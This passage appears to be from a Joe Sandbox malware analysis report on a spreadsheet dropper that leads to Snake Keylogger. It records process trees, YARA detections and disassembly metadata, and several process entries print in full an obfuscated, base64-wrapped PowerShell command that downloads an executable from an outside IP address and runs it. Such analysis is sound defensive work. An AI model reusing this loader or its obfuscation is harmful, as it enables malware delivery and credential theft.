                                                                                  Commandline:POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x13fc90000
                                                                                  File size:443'392 bytes
                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:04:12:28
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
                                                                                  Imagebase:0x13f390000
                                                                                  File size:2'758'280 bytes
                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:04:12:29
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
                                                                                  Imagebase:0x13f960000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:04:12:34
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'028'673 bytes
                                                                                  MD5 hash:7F0098DCC054A27F80296ADF300573EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:04:12:40
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                  Imagebase:0x13fac0000
                                                                                  File size:13'824 bytes
                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:04:12:41
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0xf50000
                                                                                  File size:45'248 bytes
                                                                                  MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:04:12:43
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x49e30000
                                                                                  File size:345'088 bytes
                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:04:12:43
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x13f470000
                                                                                  File size:443'392 bytes
                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:04:12:45
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
                                                                                  Imagebase:0x13fb70000
                                                                                  File size:2'758'280 bytes
                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:04:12:46
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
                                                                                  Imagebase:0x13f180000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:04:12:51
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'028'673 bytes
                                                                                  MD5 hash:7F0098DCC054A27F80296ADF300573EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:23
                                                                                  Start time:04:12:58
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                                  Imagebase:0xf50000
                                                                                  File size:45'248 bytes
                                                                                  MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Call Graph

                                                                                  • Entrypoint
                                                                                  • Decryption Function
                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Show Help
                                                                                  callgraph 1 Error: Graph is empty

                                                                                  Module: Sheet1

                                                                                  Declaration
                                                                                  LineContent
                                                                                  1

                                                                                  Attribute VB_Name = "Sheet1"

                                                                                  2

                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                  3

                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                  4

                                                                                  Attribute VB_Creatable = False

                                                                                  5

                                                                                  Attribute VB_PredeclaredId = True

                                                                                  6

                                                                                  Attribute VB_Exposed = True

                                                                                  7

                                                                                  Attribute VB_TemplateDerived = False

                                                                                  8

                                                                                  Attribute VB_Customizable = True

                                                                                  Module: Sheet2

                                                                                  Declaration
                                                                                  LineContent
                                                                                  1

                                                                                  Attribute VB_Name = "Sheet2"

                                                                                  2

                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                  3

                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                  4

                                                                                  Attribute VB_Creatable = False

                                                                                  5

                                                                                  Attribute VB_PredeclaredId = True

                                                                                  6

                                                                                  Attribute VB_Exposed = True

                                                                                  7

                                                                                  Attribute VB_TemplateDerived = False

                                                                                  8

                                                                                  Attribute VB_Customizable = True

                                                                                  Module: Sheet3

                                                                                  Declaration
                                                                                  LineContent
                                                                                  1

                                                                                  Attribute VB_Name = "Sheet3"

                                                                                  2

                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                  3

                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                  4

                                                                                  Attribute VB_Creatable = False

                                                                                  5

                                                                                  Attribute VB_PredeclaredId = True

                                                                                  6

                                                                                  Attribute VB_Exposed = True

                                                                                  7

                                                                                  Attribute VB_TemplateDerived = False

                                                                                  8

                                                                                  Attribute VB_Customizable = True

                                                                                  Module: ThisWorkbook

                                                                                  Declaration
                                                                                  LineContent
                                                                                  1

                                                                                  Attribute VB_Name = "ThisWorkbook"

                                                                                  2

                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                  3

                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                  4

                                                                                  Attribute VB_Creatable = False

                                                                                  5

                                                                                  Attribute VB_PredeclaredId = True

                                                                                  6

                                                                                  Attribute VB_Exposed = True

                                                                                  7

                                                                                  Attribute VB_TemplateDerived = False

                                                                                  8

                                                                                  Attribute VB_Customizable = True

                                                                                  Reset < >

                                                                                    Executed Functions

                                                                                    Function 02930FB1 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.415774452.0000000002930000.00000010.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_2930000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction ID: 4fff86b122d9a78aabb0473233b036b3461d46438ee885076d970452d3b182d6
                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 02930FB9 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.415774452.0000000002930000.00000010.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_2930000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction ID: 4fff86b122d9a78aabb0473233b036b3461d46438ee885076d970452d3b182d6
                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 02930FC1 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.415774452.0000000002930000.00000010.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_2930000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction ID: 4fff86b122d9a78aabb0473233b036b3461d46438ee885076d970452d3b182d6
                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                    • Instruction Fuzzy Hash:

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 3861 7fe899a7ae1 3862 7fe899a7af1 URLDownloadToFileW 3861->3862 3864 7fe899a7c00 3862->3864

                                                                                    Executed Functions

                                                                                    Function 000007FE899A7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 102 7fe899a7018-7fe899a7ba1 106 7fe899a7bab-7fe899a7bb1 102->106 107 7fe899a7ba3-7fe899a7ba8 102->107 108 7fe899a7bbb-7fe899a7bfe URLDownloadToFileW 106->108 109 7fe899a7bb3-7fe899a7bb8 106->109 107->106 110 7fe899a7c06-7fe899a7c23 108->110 111 7fe899a7c00 108->111 109->108 111->110
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451509907.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: DownloadFile
                                                                                    • String ID:
                                                                                    • API String ID: 1407266417-0
                                                                                    • Opcode ID: a7c5f9d6028f485ef64889265750188a8f8e518ecce8b77a092c6d948952a0cc
                                                                                    • Instruction ID: 1e115c36a6d05284c9c75bbbe2c80801aea70e8c3bf9f87b55bd9e2196316f6b
                                                                                    • Opcode Fuzzy Hash: a7c5f9d6028f485ef64889265750188a8f8e518ecce8b77a092c6d948952a0cc
                                                                                    • Instruction Fuzzy Hash: E731917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81
                                                                                    Function 000007FE89A7380A Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 88M$XhT
                                                                                    • API String ID: 0-50409379
                                                                                    • Opcode ID: f01644ed20692df8b83e741b2856da1d6eb04296aa9298278e591e195a8859bd
                                                                                    • Instruction ID: 23fd1be2deb36ab337eb1fb7be9d790def0604bdad2bbdf93f016c5e7be254d7
                                                                                    • Opcode Fuzzy Hash: f01644ed20692df8b83e741b2856da1d6eb04296aa9298278e591e195a8859bd
                                                                                    • Instruction Fuzzy Hash: C881FE2190E7D60FEB53937858216A57FF1DF47650B0E41EBC4C9CB1A3D919AC0AC3A2
                                                                                    Function 000007FE89A7566D Relevance: 1.7, Strings: 1, Instructions: 470COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 29 7fe89a7566d-7fe89a75677 30 7fe89a75679 29->30 31 7fe89a7567e-7fe89a7568f 29->31 30->31 34 7fe89a7567b 30->34 32 7fe89a75696-7fe89a756a7 31->32 33 7fe89a75691 31->33 36 7fe89a756a9 32->36 37 7fe89a756ae-7fe89a756bf 32->37 33->32 35 7fe89a75693 33->35 34->31 35->32 36->37 38 7fe89a756ab 36->38 39 7fe89a756c6-7fe89a756d7 37->39 40 7fe89a756c1 37->40 38->37 42 7fe89a756d9 39->42 43 7fe89a756de-7fe89a75720 39->43 40->39 41 7fe89a756c3 40->41 41->39 42->43 44 7fe89a756db 42->44 45 7fe89a75778-7fe89a7579a 43->45 46 7fe89a75722-7fe89a75749 43->46 44->43 49 7fe89a757a0-7fe89a757a8 45->49 50 7fe89a75903-7fe89a759cc 45->50 47 7fe89a757a9-7fe89a757aa 46->47 48 7fe89a7574b-7fe89a75777 46->48 51 7fe89a757ac-7fe89a757b9 47->51 52 7fe89a757c3-7fe89a757c8 47->52 48->45 49->47 51->52 53 7fe89a757bb-7fe89a757c1 51->53 54 7fe89a757ce-7fe89a757d1 52->54 55 7fe89a758a3-7fe89a758ad 52->55 53->52 57 7fe89a75816 54->57 58 7fe89a757d3-7fe89a757e2 54->58 59 7fe89a758be-7fe89a758ce 55->59 60 7fe89a758af-7fe89a758bd 55->60 61 7fe89a75818-7fe89a7581a 57->61 58->50 71 7fe89a757e8-7fe89a757f2 58->71 62 7fe89a758db-7fe89a75900 59->62 63 7fe89a758d0-7fe89a758d4 59->63 61->55 66 7fe89a75820-7fe89a75826 61->66 62->50 63->62 68 7fe89a75828-7fe89a75835 66->68 69 7fe89a75842-7fe89a75884 66->69 68->69 73 7fe89a75837-7fe89a75840 68->73 84 7fe89a7588a-7fe89a758a2 69->84 74 7fe89a7580b-7fe89a75814 71->74 75 7fe89a757f4-7fe89a75801 71->75 73->69 74->61 75->74 77 7fe89a75803-7fe89a75809 75->77 77->74
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: V
                                                                                    • API String ID: 0-1342839628
                                                                                    • Opcode ID: 675ac335b4be1ea86a9de04222bbf9ba35a1dd95a51a0a7f1d7d9d9e79ffe55e
                                                                                    • Instruction ID: 76203a8579d1a2dc8a73b5aa16c29ffdb68667995b780191aa31e27d9be447b4
                                                                                    • Opcode Fuzzy Hash: 675ac335b4be1ea86a9de04222bbf9ba35a1dd95a51a0a7f1d7d9d9e79ffe55e
                                                                                    • Instruction Fuzzy Hash: D5D1F53180E7C92FD34797285C156B67FA4EF47260F0911EBD48DCB0A3E619AD5AC3A2
                                                                                    Function 000007FE899A7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451509907.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: DownloadFile
                                                                                    • String ID:
                                                                                    • API String ID: 1407266417-0
                                                                                    • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                    • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                                                    • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                    • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781
                                                                                    Function 000007FE89A78549 Relevance: .7, Instructions: 710COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
